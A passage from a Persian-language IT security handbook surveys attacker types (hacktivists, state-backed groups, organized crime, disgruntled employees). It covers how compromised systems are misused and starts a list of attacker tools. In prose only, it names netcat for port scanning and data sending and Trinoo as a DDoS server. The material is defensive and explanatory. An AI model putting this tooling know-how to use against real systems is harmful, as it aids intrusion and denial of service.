‫ﺍﻋﺘﺒﺎﺭﻱ ﻣﺸﺘﺮﻳﺎﻥ ﺭﺍ ﺍﺯ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﻳﻚ ﺷﺮﻛﺖ ﺩﺯﺩﻳﺪﻩ ﻭ ﺗﻬﺪﻳﺪ ﻛﺮﺩﻩﺍﻧﺪ ﻛﻪ ﺍﻃﻼﻋﺎﺕ ﺭﺍ ﻣﻨﺘﺸﺮ ﺧﻮﺍﻫﻨﺪ ﻛـﺮﺩ ﻣﮕـﺮ ﺍﻳﻨﻜـﻪ ﺷـﺮﻛﺖ‬
‫ﺑﻬﺎﻳﻲ ﺑﻪ ﺁﻧﻬﺎ ﺑﭙﺮﺩﺍﺯﺩ‪ .‬ﻫﻤﭽﻨﻴﻦ ﮔﺰﺍﺭﺷﻬﺎﻳﻲ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﻣﺒﻨﻲ ﺑﺮ ﺍﻳﻨﻜﻪ ﻣﻬﺎﺟﻤﻴﻨﻲ ﺳﻌﻲ ﻛﺮﺩﻩﺍﻧﺪ ﺍﺳﺮﺍﺭ ﺻﻨﻌﺘﻲ ﺷﺮﻛﺘﻬﺎﻳﻲ ﻛﻪ ﻣﻮﺭﺩ ﻧﻔﻮﺫ‬
‫ﻗﺮﺍﺭ ﺩﺍﺩﻩﺍﻧﺪ ﺭﺍ ﺑﻪ ﺭﻗﺒﺎﻳﺸﺎﻥ ﺑﻔﺮﻭﺷﻨﺪ‪ .‬ﺍﻳﻦ ﻣﻌﺎﻣﻼﺕ ﺩﺭ ﺍﻳﺎﻻﺕ ﻣﺘﺤﺪﻩ ﻭ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﻛـﺸﻮﺭﻫﺎﻱ ﺩﻳﮕـﺮ ‪ -‬ﻭ ﺍﻟﺒﺘـﻪ ﻧـﻪ ﻫﻤـﻪ ﻛـﺸﻮﺭﻫﺎ ‪-‬‬
‫ﻏﻴﺮﻗﺎﻧﻮﻧﻲ ﺍﻋﻼﻡ ﺷﺪﻩ ﺍﺳﺖ‪.‬‬
‫ﺍﻳﺪﻩﭘﺮﺩﺍﺯﺍﻥ ﻭ ﻋﻮﺍﻣﻞ ﺣﻜﻮﻣﺘﻲ‬
‫ﻻ ﻧﻴـﺖ‬
‫ﻫﻤﻴﺸﻪ ﻭ ﺩﺭ ﻫﻤﺔ ﺟﻮﺍﻣﻊ ﺟﻤﻌﻴﺘﻲ ﺍﺯ "ﻣﺘﻔﻜﺮﺍﻥ ﻣﺨﺎﻟﻒ" ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﻛﻪ ﺑﺪﻻﻳﻞ ﻓﻜﺮﻱ ﻳﺎ ﺳﻴﺎﺳﻲ ﺑﻪ ﺳﺎﻳﺘﻬﺎ ﻧﻔﻮﺫ ﻣﻲﻛﻨﻨﺪ‪ .‬ﻣﻌﻤـﻮ ﹰ‬
‫ﺍﻳﻦ ﺍﻓﺮﺍﺩ "ﺗﻐﻴﻴﺮ ﻇﺎﻫﺮ ﺻﻔﺤﺎﺕ ﻭﺏ" ﺑﺮﺍﻱ ﻧﻮﻋﻲ ﺍﻧﺘﺸﺎﺭ ﺑﻴﺎﻧﻴﻪ ﺍﺳﺖ‪ .‬ﮔﺎﻫﻲ ﻣﺨﺎﻟﻔﻴﻦ ﻳﻚ ﺑﻴﺎﻧﻴﻪ ﺳﻴﺎﺳﻲ ﻣﻨﺘﺸﺮ ﻣﻲﻛﻨﻨﺪ‪ ،‬ﮔـﺎﻫﻲ ﻣﻤﻜـﻦ‬
‫ﺍﺳﺖ ﻳﻚ ﻣﺴﺌﻠﻪ ﻓﻜﺮﻱ ﺭﺍ ﺍﺑﺮﺍﺯ ﻛﻨﻨﺪ‪ ،‬ﻳﺎ ﻣﻤﻜﻦ ﺍﺳﺖ ﺻﺮﻓﹰﺎ ﺁﺷﻮﺏﻃﻠﺒﺎﻧﻲ ﺑﺎﺷﻨﺪ ﻛﻪ ﻋﻠﻴﻪ ﺻﻨﻌﺖ ﻳﺎ ﺑﺎﺯﺍﺭ ﺟﻨﺠﺎﻝ ﺑﻪ ﺭﺍﻩ ﻣﻲﺍﻧﺪﺍﺯﻧﺪ‪.‬‬
‫ﺍﻳﻦ ﻭﻗﺎﻳﻊ ﮔﺎﻫﻲ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﺮﺧﻼﻑ ﻋﻼﻳﻖ ﻣﻠﻲ ﺍﻧﺠﺎﻡ ﺷﻮﺩ‪ .‬ﺑﺮﺍﻱ ﻣﺜﺎﻝ ﻣﻤﻜﻦ ﺍﺳﺖ ﻳﻚ ﺟﻨﺒﺶ ﭼﺮﻳﻜﻲ ﻇﺎﻫﺮ ﺳﺎﻳﺘﻬﺎﻱ ﻣﺘﻌﻠﻖ ﺑـﻪ‬
‫ﻳﻚ ﺩﺳﺘﻪ ﺍﺯ ﻣﺨﺎﻟﻔﺎﻥ ﺩﻭﻟﺘﻲ ﺭﺍ ﺗﻐﻴﻴﺮ ﺩﻫﺪ‪ .‬ﺩﺭ ﺳﺎﻳﺮ ﻣﻮﺍﺭﺩ ﺍﻓﺮﺍﺩﻱ ﻣﺸﺎﻫﺪﻩ ﻣﻲﺷﻮﻧﺪ ﻛﻪ ﺗﻼﺵ ﻣﻲﻛﻨﻨﺪ ﺑﺎ ﺣﻤﻠﻪ ﺑﻪ ﺳﺎﻳﺘﻬﺎ ﺩﺭ ﻳﻚ ﺣﻮﺯﺓ‬
‫ﺣﻜﻮﻣﺘﻲ‪ ،‬ﻫﺪﻓﻲ ﺭﺍ ﺩﺭ ﻳﻚ ﺣﻮﺯﻩ ﺩﻳﮕﺮ ﺑﺮﺁﻭﺭﺩﻩ ﻛﻨﻨﺪ؛ ﻣﺎﻧﻨﺪ ﺩﺭﮔﻴﺮﻳﻬﺎﻱ ﺍﺳﺮﺍﺋﻴﻞ ﻭ ﻓﻠﺴﻄﻴﻦ‪ ،‬ﺟﺪﺍﻝ ﻣﻴﺎﻥ ﻫﻨﺪ ﻭ ﭘﺎﻛﺴﺘﺎﻥ‪ ،‬ﻭ ﭘـﺲ ﺍﺯ ﺁﻥ‬
‫ﺑﻤﺒﺎﺭﺍﻥ ﺳﻔﺎﺭﺕ ﭼﻴﻦ ﺗﻮﺳﻂ ﻧﻴﺮﻭﻫﺎﻱ ﺍﻳﺎﻻﺕ ﻣﺘﺤﺪﻩ‪ .‬ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺍﻳﻦ ﺗﻬﺎﺟﻤﺎﺕ ﻣﻤﻜﻦ ﺍﺳﺖ ﺧﻮﺩﺟﻮﺵ ﺑﺎﺷﻨﺪ‪ ،‬ﺑﻌﻀﻲ ﻫﻢ ﻣﻤﻜﻦ ﺍﺳـﺖ‬
‫ﺗﻮﺳﻂ ﺧﻮﺩ ﺣﻜﻮﻣﺘﻬﺎ ﺑﺮﻧﺎﻣﻪﺭﻳﺰﻱ ﻭ ﺣﻤﺎﻳﺖ ﻣﺎﻟﻲ ﺷﻮﻧﺪ‪.‬‬
‫ﺍﻳﻦ ﻭﻗﺎﻳﻊ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺍﺷﺨﺎﺹ ﺛﺎﻟﺚ ﺭﺍ ﻧﻴﺰ ﺗﺤﺖ ﺗﺄﺛﻴﺮ ﻗﺮﺍﺭ ﺩﻫﻨﺪ‪ .‬ﺑﺮﺍﻱ ﻣﺜﺎﻝ ﺩﺭ ﺧﻼﻝ ﻳﻚ ﻧﻔﻮﺫ ﺩﺭ ﭼـﻴﻦ‪ ،‬ﺑـﺴﻴﺎﺭﻱ ﺍﺯ ‪ISP‬ﻫـﺎﻳﻲ ﻛـﻪ‬
‫ﺻﻔﺤﺎﺕ ﻭﺏ ﻫﻮﺍﺩﺍﺭﺍﻥ ‪ Falun Gong‬ﺭﺍ ﺩﺭ ﺍﻃﺮﺍﻑ ﺟﻬﺎﻥ ﻣﻴﺰﺑﺎﻧﻲ ﻣﻲﻛﺮﺩﻧﺪ ﻣﺘﻮﺟﻪ ﺷﺪﻧﺪ ﻛﻪ ﺳـﺮﻭﻳﺲﺩﻫﻨﺪﮔﺎﻧـﺸﺎﻥ ﺗﺤـﺖ ﺗﻬـﺎﺟﻢ‬
‫ﺳﺎﻳﺘﻬﺎﻳﻲ ﺍﺯ ﺩﺍﺧﻞ ﭼﻴﻦ ﻗﺮﺍﺭ ﺩﺍﺭﻧﺪ‪ .‬ﺑﻪ ﺩﻟﻴﻞ ﻫﻤﺎﻫﻨﮕﻲ ﻭ ﺗﻌﺪﺩ ﺣﻤﻼﺕ‪ ،‬ﻣﻘﺎﻣﺎﺕ ﻣﺴﺌﻮﻝ ﻣﻌﺘﻘﺪﻧﺪ ﻛﻪ ﺍﻳﻦ ﺣﻤـﻼﺕ ﺑـﺎ ﭘـﺸﺘﻴﺒﺎﻧﻲ ﺩﻭﻟـﺖ‬
‫ﺑﻮﺩﻩ ﺍﺳﺖ‪.‬‬
‫ﺟﺮﻡ ﺳﺎﺯﻣﺎﻥﻳﺎﻓﺘﻪ‬
‫ﺭﻭﺯﺍﻧﻪ ﻣﻘﺎﺩﻳﺮ ﻫﻨﮕﻔﺘﻲ ﺍﺯ ﺍﻃﻼﻋﺎﺕ ﺑﺎ ﺍﺭﺯﺵ ﻭ ﺩﺍﺩﻩﻫﺎﻱ ﻣﺎﻟﻲ ﺩﺭ ﺍﻳﻨﺘﺮﻧﺖ ﺩﺭﺣﺎﻝ ﺗﺒﺎﺩﻝ ﺍﺳﺖ‪ .‬ﺧﻮﺵﺑﺎﻭﺭﺍﻧﻪ ﺍﺳﺖ ﻛﻪ ﺗﺼﻮﺭ ﺷﻮﺩ ﻋﻨﺎﺻـﺮ‬
‫ﺗﺒﻬﻜﺎﺭ ﺍﺯ ﺍﻳﻦ ﻣﺴﺌﻠﻪ ﺧﺒﺮ ﻧﺪﺍﺭﻧﺪ‪ ،‬ﻳﺎ ﻋﻼﻗﻪﻣﻨﺪ ﻧﻴﺴﺘﻨﺪ ﻓﻌﺎﻟﻴﺘﻬﺎﻱ ﺧﻮﺩ ﺭﺍ ﺑﻪ ﺟﻬﺎﻥ ﺷـﺒﻜﻪﺷـﺪﻩ ﮔـﺴﺘﺮﺵ ﺩﻫﻨـﺪ‪ .‬ﺣﻤﻠـﻪﻫـﺎﻳﻲ ﺍﺯ ﻗﺒﻴـﻞ‬
‫ﻛﻼﻫﺒﺮﺩﺍﺭﻱ‪ ،‬ﺩﺯﺩﻱ ﺍﻃﻼﻋﺎﺕ‪ ،‬ﻭ ﭘﻮﻟﺸﻮﺋﻲ ﻛﻪ ﺑﺼﻮﺭﺕ ‪ online‬ﻫﺪﺍﻳﺖ ﺷﺪﻩ ﺭﺥ ﺩﺍﺩﻩ ﺍﺳﺖ ﻛﻪ ﻣﻘﺎﻣـﺎﺕ ﻣـﺴﺌﻮﻝ ﻣﻌﺘﻘﺪﻧـﺪ ﻫﻤﮕـﻲ ﺩﺭ‬
‫ﺯﻣﺮﺓ ﺟﺮﺍﺋﻢ ﺳﺎﺯﻣﺎﻧﻴﺎﻓﺘﻪ ﻫﺴﺘﻨﺪ‪ .‬ﺍﺭﺗﺒﺎﻃﺎﺕ ﺭﻭﻱ ﺷﺒﻜﻪ ﺑﺮﺍﻱ ﮔﺴﺘﺮﺵ ﻭ ﻫﻤﺎﻫﻨﮕﻲ ﺧﻮﺩﻓﺮﻭﺷﻲﻫﺎ ﻭ ﻓﺤـﺸﺎ‪ ،‬ﻗﻤـﺎﺭ‪ ،‬ﺳـﻮﺩﺍﮔﺮﻱ ﺑـﺎ ﻣـﻮﺍﺩ‬
‫ﻻ ﻣﺸﻤﻮﻝ ﺟﺮﺍﺋﻢ ﺳﺎﺯﻣﺎﻧﻴﺎﻓﺘﻪ ﻣﻲﺷﻮﺩ‪ ،‬ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﮔﺮﻓﺘﻪ ﺍﺳﺖ‪ .‬ﻋـﻼﻭﻩ‬
‫ﻏﻴﺮﻗﺎﻧﻮﻧﻲ‪ ،‬ﻫﺠﻮﻡ ﻣﺴﻠﺤﺎﻧﻪ‪ ،‬ﻭ ﺳﺎﻳﺮ ﻓﻌﺎﻟﻴﺘﻬﺎﻳﻲ ﻛﻪ ﻣﻌﻤﻮ ﹰ‬
‫ﺑﺮ ﺁﻥ ﺩﻭﺍﻳﺮ ﺍﺟﺮﺍﻱ ﻗﻮﺍﻧﻴﻦ ﻣﻤﻜﻦ ﺍﺳﺖ ﺗﻮﺳﻂ ﻣﺠﺮﻣﻴﻦ ﺑﺮﺍﻱ ﻛﺸﻒ ﺁﻧﭽﻪ ﺩﻭﻟﺖ ﺩﺭ ﺭﺍﺑﻄﻪ ﺑﺎ ﺁﻧﻬﺎ ﻣﻲﺩﺍﻧـﺪ ﻳـﺎ ﻛـﺸﻒ ﻣﺸﺨـﺼﺎﺕ ﺧﺒـﺮ‬
‫ﺭﺳﺎﻧﺎﻥ ﻭ ﺷﻬﻮﺩ‪ ،‬ﻣﻮﺭﺩ ﻫﺪﻑ ﻗﺮﺍﺭ ﮔﻴﺮﻧﺪ‪.‬‬
‫‪٢٦٩‬‬
‫ﺑﺨﺶ ﭘﻨﺠﻢ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺭﺍﻫﺒﺮﺍﻥ ﻓﻨﻲ‬
‫ﺑﺎ ﺟﻬﺎﻧﻲ ﺷﺪﻥ ﺷﺒﻜﻪ‪ ،‬ﺗﻬﺪﻳﺪﺍﺕ ﮔﺴﺘﺮﺓ ﺑﻴﺸﺘﺮﻱ ﭘﻴﺪﺍ ﻛﺮﺩﻩﺍﻧﺪ‪ .‬ﺍﻣﺮﻭﺯﻩ ﺩﻳﮕﺮ ﺑﺎﻧﺪ ﺩﺯﺩﺍﻥ ﺭﻭﺳﻲ‪ ،‬ﻣﺎﻓﻴﺎﺋﻲﻫﺎﻱ ﺳﻴـﺴﻴﻞ‪ ،‬ﻳـﺎﻛﻮﺯﺍﻱ ﮊﺍﭘـﻦ‪،‬‬
‫ﺗﺠﺎﺭ ﻣﻮﺍﺩ ﻣﺨﺪﺭ ﺩﺭ ﺁﻣﺮﻳﻜﺎﻱ ﺟﻨﻮﺑﻲ‪ ،‬ﻭ ﮔﺮﻭﻩ ﺍﺭﺍﺫﻝ ﻭ ﺍﻭﺑﺎﺵ ﻟﺲ ﺁﻧﺠﻠﺲ‪ ،‬ﻫﻤﻪ ﻭ ﻫﻤﻪ ﺭﻭﻱ ﺷﺒﻜﺔ ﺟﻬﺎﻧﻲ ﺗﻨﻬﺎ ﭼﻨﺪ ﻛﻠﻴـﻚ ﻣـﺎﻭﺱ ﺍﺯ‬
‫ﻣﺎ ﻓﺎﺻﻠﻪ ﺩﺍﺭﻧﺪ‪ .‬ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﻣﻘﺎﻣﺎﺕ ﺩﺍﻳﺮﻩ ﺍﺟﺮﺍﻱ ﻗﻮﺍﻧﻴﻦ ﺍﺯ ﺍﻳﻨﻜﻪ ﺍﻳﻨﺘﺮﻧﺖ ﺩﺭ ﺩﻫﻪ ﺁﻳﻨﺪﻩ ﻣﺤﻞ ﺭﺷﺪ ﺟﺮﺍﺋﻢ ﺍﺳﺖ ﻧﮕﺮﺍﻧﻨﺪ‪.‬‬
‫ﻛﺎﺭﻣﻨﺪﺍﻥ ﻛﻼﺵ‬
‫ﻭ ﺑﺎﻻﺧﺮﻩ‪ ،‬ﺗﻌﺪﺍﺩ ﺯﻳﺎﺩﻱ ﻛﺎﺭﻛﻨﺎﻥ ﺑﺎﻣﻬﺎﺭﺕ ﻭﺟﻮﺩ ﺩﺍﺭﻧﺪ ﻛﻪ ﺑﺮﺍﻱ ﺍﻧﺘﻘﺎﻡ‪ ،‬ﻛﻴﻨﻪﺗﻮﺯﻱ‪ ،‬ﻳﺎ ﺍﺫﻳﺖ ﻭ ﺁﺯﺍﺭ‪ ،‬ﻋﻠﻴﻪ ﻛﺎﺭﻓﺮﻣﺎﻳﺎﻥ ﺧﻮﺩ ﺍﻗﺪﺍﻡ ﻛﺮﺩﻩﺍﻧـﺪ‪.‬‬
‫ﺩﺭ ﺑﻌﻀﻲ ﻣﻮﺍﺭﺩ‪ ،‬ﻛﺎﺭﻛﻨﺎﻥ ﺍﺧﺮﺍﺝ ﺷﺪﻩ ﺩﺭ ﺭﺍﻳﺎﻧﺔ ﻛﺎﺭﻓﺮﻣﺎﻳﺸﺎﻥ ﺍﺳﺒﻬﺎﻱ ﺗﺮﺍﻭﺍ ﺟﺎ ﺩﺍﺩﻩﺍﻧﺪ‪.‬‬
‫ﻣﻬﺎﺟﻤﺎﻥ ﺑﺪﻧﺒﺎﻝ ﭼﻪ ﭼﻴﺰﻱ ﻫﺴﺘﻨﺪ‬
‫ﻻ ﭘﺎﻳﺎﻥ ﻛﺎﺭ ﻳﻚ ﻧﻔﻮﺫﮔﺮ ﻧﻴﺴﺖ‪ ،‬ﺑﻠﮑﻪ ﺍﻏﻠﺐ ﻣﻬﺎﺟﻤﻴﻦ ﺍﺯ ﺳﻴﺴﺘﻤﻬﺎﻳﻲ ﻛﻪ ﺗﺤﺖ‬
‫ﺻﺮﻑ ﺑﺪﺳﺖ ﮔﺮﻓﺘﻦ ﻛﻨﺘﺮﻝ ﻳﻚ ﺳﻴﺴﺘﻢ ﺭﺍﻳﺎﻧﻪﺍﻱ ﻣﻌﻤﻮ ﹰ‬
‫ﻓﺮﻣﺎﻥ ﺧﻮﺩ ﺩﺭ ﺁﻭﺭﺩﻩﺍﻧﺪ ﺑﻌﻨﻮﺍﻥ ﮔﺎﻡ ﻧﺨﺴﺖ ﺣﻤﻼﺕ ﻭ ﺧﺮﺍﺑﻜﺎﺭﻱﻫﺎﻱ ﺑﻌﺪﻱ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﻨﺪ‪ .‬ﭘﺲ ﺍﺯ ﺁﻧﻜﻪ ﻣﻬﺎﺟﻢ ﻳﻚ ﺳﻴﺴﺘﻢ ﺭﺍ ﺗﺤﺖ‬
‫ﻓﺮﻣﺎﻥ ﺧﻮﺩ ﺩﺭ ﻣﻲﺁﻭﺭﺩ‪ ،‬ﺳﻴﺴﺘﻢ ﻣﻲﺗﻮﺍﻧﺪ ﺑﺮﺍﻱ ﺍﻫﺪﺍﻑ ﺷﺮﺍﺭﺕﺑﺎﺭ ﻣﺨﺘﻠﻔﻲ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﮔﻴﺮﺩ‪ .‬ﺍﺯ ﺁﻥ ﺟﻤﻠﻪﺍﻧﺪ‪:‬‬
‫•‬
‫•‬
‫•‬
‫•‬
‫•‬
‫ﺷﺮﻭﻉ ﻛﺎﻭﺷﻬﺎ ﻳﺎ ﺳﻮﺀ ﺍﺳﺘﻔﺎﺩﻩﻫﺎ ﻋﻠﻴﻪ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺩﻳﮕﺮ؛‬
‫ﺷﺮﻛﺖ ﺩﺍﺩﻥ ﺳﻴﺴﺘﻢ ﺩﺭ ﺣﻤﻼﺕ ﺗﻮﺯﻳﻊﺷﺪﻩ ﺗﺨﺮﻳﺐ ﺳﺮﻭﻳﺲ؛‬
‫‪٣٩‬‬
‫ﻼ ﻣﻬﺎﺟﻢ ﻣﻤﻜﻦ ﺍﺳﺖ ﻳﻚ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﭘﻴﺎﻡ ﺍﺭﺗﺒﺎﻁ ﺍﻳﻨﺘﺮﻧﺘﻲ ﺭﺍﻩﺍﻧﺪﺍﺯﻱ ﻛﻨﺪ ﻛﻪ ﺑﻌﻨﻮﺍﻥ ﻭﻋﺪﻩﮔﺎﻫﻲ ﺑﺮﺍﻱ‬
‫ﺍﺟﺮﺍﻱ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎﻱ ﻣﺨﻔﻲ )ﻣﺜ ﹰ‬
‫ﺍﺳﺒﻬﺎﻱ ﺗﺮﺍﻭﺍ ﻭ ﻭﻳﺮﻭﺳﻬﺎﻳﻲ ﻛﻪ ﺩﺍﺩﻩﻫﺎﻱ ﺩﺳﺘﺒﺮﺩ ﺯﺩﻩ ﺷﺪﻩ ﺭﺍ ﭘﺲ ﻣﻲﻓﺮﺳﺘﻨﺪ ﻋﻤﻞ ﻛﻨﺪ(؛‬
‫ﻛﻨﺘﺮﻝ ﻣﺨﻔﻴﺎﻧﺔ ﺷﺒﻜﺔ ﺳﺎﺯﻣﺎﻧﻲ ﻛﻪ ﻣﺎﻟﻚ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺑﻪ ﺗﺴﺨﻴﺮ ﺩﺭﺁﻣﺪﻩ ﺍﺳﺖ‪ ،‬ﺑﺎ ﻫﺪﻑ ﺑﻪ ﺗﺴﺨﻴﺮ ﺩﺭﺁﻭﺭﺩﻥ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺑﻴﺸﺘﺮ؛ ﻭ‬
‫ﺗﺒﺪﻳﻞ ﮐﺮﺩﻥ ﺁﻥ ﺑﻪ ﺍﻧﺒﺎﺭﻩﺍﻱ ﺍﺯ ﺍﺑﺰﺍﺭﻫﺎﻱ ﺗﻬﺎﺟﻢ‪ ،‬ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﻣﺴﺮﻭﻗﻪ‪ ،‬ﻓﺤﺸﺎ‪ ،‬ﻳﺎ ﺍﻧﻮﺍﻉ ﺩﻳﮕﺮ ﺍﻃﻼﻋﺎﺕ ﻗﺎﭼﺎﻕ‪.‬‬
‫ﺍﺑﺰﺍﺭﻫﺎﻱ ﺗﺠﺎﺭﺕ ﻣﻬﺎﺟﻤﻴﻦ‬
‫ﻻ ﺗﻮﺳﻂ ﻣﻬﺎﺟﻤﻴﻦ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﻣﻲﮔﻴﺮﻧﺪ ﻋﺒﺎﺭﺗﻨﺪ ﺍﺯ‪:‬‬
‫ﮔﻮﺷﻪﺍﻱ ﺍﺯ ﺍﺑﺰﺍﺭﻫﺎﻳﻲ ﻛﻪ ﻣﻌﻤﻮ ﹰ‬
‫‪(a.k.a netcat) nc‬‬
‫‪٤١‬‬
‫‪ netcat‬ﻛﻪ ﺩﺭ ﺍﺑﺘﺪﺍ ﺗﻮﺳﻂ ﻫﻮﺑﻴﺖ ﻧﻮﺷﺘﻪ ﺷﺪ‪ ،‬ﭼﺎﻗﻮﻱ ﺍﺭﺗﺶ ﺳﻮﺋﻴﺲ ﺑﺮﺍﻱ ﺷﺒﻜﻪﻫﺎﻱ ﻣﺘﺒﻨﻲ ﺑﺮ ‪ IP‬ﺍﺳـﺖ‪ .‬ﺑﻨـﺎﺑﺮﺍﻳﻦ ‪ netcat‬ﻳـﻚ‬
‫ﺍﺑﺰﺍﺭ ﺑﺎ ﺍﺭﺯﺵ ﺭﺍﻫﺒﺮﻱ ﻭ ﻫﻤﭽﻨﻴﻦ ﻣﻔﻴﺪ ﺑﺮﺍﻱ ﻣﻬﺎﺟﻤﻴﻦ ﻣﻲﺑﺎﺷﺪ‪ .‬ﻣﻲﺗﻮﺍﻧﻴﺪ ﺍﺯ ‪ netcat‬ﺑﺮﺍﻱ ﺍﺭﺳﺎﻝ ﺩﺍﺩﺓ ﺩﻟﺨﻮﺍﻩ ﺑـﻪ ﭘﻮﺭﺗﻬـﺎﻱ ﺩﻟﺨـﻮﺍﻩ‬
‫‪ TCP/IP‬ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﺭﺍﻩ ﺩﻭﺭ ﺑﺮﺍﻱ ﺭﺍﻩﺍﻧﺪﺍﺯﻱ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎﻱ ﻣﺤﻠﻲ ‪ ،TCP/IP‬ﻭ ﺑﺮﺍﻱ ﺍﺟﺮﺍﻱ ﭘﻮﻳﺸﻬﺎﻱ ﻣﻘﺪﻣﺎﺗﻲ ﭘﻮﺭﺕ‪ ٤٢‬ﺍﺳﺘﻔﺎﺩﻩ‬
‫ﻛﻨﻴﺪ‪.‬‬
‫‪Internet Relay Chat Server‬‬
‫‪Backbone Router‬‬
‫‪Hobbit‬‬
‫‪Basic Portscan‬‬
‫‪39‬‬
‫‪40‬‬
‫‪41‬‬
‫‪42‬‬
‫ﺑﺨﺶ ﭘﻨﺠﻢ‬
‫ﺑﺮﺍﻱ ﺍﻳﻨﻜﻪ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺑﻪ ﺗﺴﺨﻴﺮ ﺩﺭﺁﻣﺪﻩ ﺗﺒﺪﻳﻞ ﺑﻪ ﺑﺴﺘﺮﻫﺎﻱ ﻋﺎﻟﻲ ﺑﺮﺍﻱ ﺍﻳﻨﮕﻮﻧﻪ ﻓﻌﺎﻟﻴﺘﻬﺎﻱ ﻏﻴﺮﻗﺎﻧﻮﻧﻲ ﺷﻮﺩ ﺩﻻﻳﻞ ﺯﻳﺎﺩﻱ ﻭﺟـﻮﺩ ﺩﺍﺭﺩ‪.‬‬
‫ﺍﮔﺮ ﻳﻚ ﺳﻴﺴﺘﻢ ﺑﻪ ﺗﺴﺨﻴﺮ ﺩﺭﺁﻣﺪﻩ ﺑﺎ ﺳﺮﻋﺖ ﺑﺎﻻ ﺑﻪ ﺍﻳﻨﺘﺮﻧﺖ ﻭﺻﻞ ﺑﺎﺷﺪ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﺘﻮﺍﻧﺪ ﺧﺮﺍﺑﻲ ﻭ ﺍﺧﺘﻼﻝ ﺑﻴﺸﺘﺮﻱ ﻧﺴﺒﺖ ﺑـﻪ ﺳـﺎﻳﺮ‬
‫ﺳﻴﺴﺘﻤﻬﺎﻱ ﺗﺤﺖ ﻛﻨﺘﺮﻝ ﻣﻬﺎﺟﻢ ﺑﺎﻋﺚ ﺷﻮﺩ‪ .‬ﺳﻴﺴﺘﻤﻬﺎﻱ ﺑﻪ ﺗﺴﺨﻴﺮ ﺩﺭﺁﻣﺪﻩ ﻫﻤﭽﻨﻴﻦ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺑﺮﺍﻱ ﺩﺷﻮﺍﺭﺗﺮ ﻛﺮﺩﻥ ﻛـﺎﺭ ﻣـﺴﺌﻮﻟﻴﻦ ﺩﺭ‬
‫ﺭﺩﻳﺎﺑﻲ ﻛﺎﺭﻫﺎﻱ ﻣﻬﺎﺟﻢ ﺗﺎ ﺭﺳﻴﺪﻥ ﺑﻪ ﻣﻬﺎﺟﻢ ﻭﺍﻗﻌﻲ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﮔﻴﺮﻧﺪ‪ .‬ﺍﮔﺮ ﻳﻚ ﻣﻬﺎﺟﻢ ﺩﺭ ﻣﻴﺎﻥ ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﺯﻳﺎﺩﻱ ﺩﺭ ﺣﻮﺯﻩﻫـﺎﻱ‬
‫ﻣﺨﺘﻠﻔﻲ ﺑﺠﻬﺪ ‪ -‬ﻣﺜﻼﹰ‪ ،‬ﺍﺯ ﻳﻚ ﺣﺴﺎﺏ ﮐﺎﺭﺑﺮﻱ ﺗﺤﺖ ‪ Unix‬ﺩﺭ ﻓﺮﺍﻧﺴﻪ ﺗﺎ ﻳﻚ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ‪ proxy‬ﻣﺒﺘﻨﻲ ﺑـﺮ ‪ windows‬ﺩﺭ ﻛـﺮﻩ‬
‫ﺟﻨﻮﺑﻲ‪ ،‬ﻭ ﺍﺯ ﻳﻚ ﻣﺮﻛﺰ ﺭﺍﻳﺎﻧﺔ ﺩﺍﻧﺸﮕﺎﻫﻲ ﺩﺭ ﻣﻜﺰﻳﻚ ﺗﺎ ﻳﻚ ﻣﺴﻴﺮﻳﺎﺏ ﺷﺎﻫﺮﺍﻩ‪ ٤٠‬ﺩﺭ ﻧﻴﻮﻳﻮﺭﻙ ‪ -‬ﻣﻤﻜﻦ ﺍﺳـﺖ ﻭﺍﻗﻌـﹰﺎ ﺭﺩﻳـﺎﺑﻲ ﻣﻌﻜـﻮﺱ‬
‫ﻣﻬﺎﺟﻢ ﺑﻪ ﺳﻤﺖ ﻣﺒﺪﺃ ﻏﻴﺮ ﻣﻤﻜﻦ ﺷﻮﺩ‪.‬‬
‫‪٢٧٠‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬
‫‪(a.k.a. Trinoo) Trinoo‬‬
‫‪ Trinoo‬ﻳﻚ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﺗﻬﺎﺟﻢ ﺍﺳﺖ‪ .‬ﺍﻳﻦ ﺑﺮﻧﺎﻣﻪ ﻣﻨﺘﻈﺮ ﺩﺭﻳﺎﻓﺖ ﻳﻚ ﭘﻴﺎﻡ ﺍﺯ ﻳﻚ ﺳﻴﺴﺘﻢ ﺭﺍﻩ ﺩﻭﺭ ﻣﻲﻣﺎﻧﺪ‪ ،‬ﻭ ﺑﺎ ﺩﺭﻳﺎﻓﺖ ﭘﻴـﺎﻡ ﻳـﻚ‬
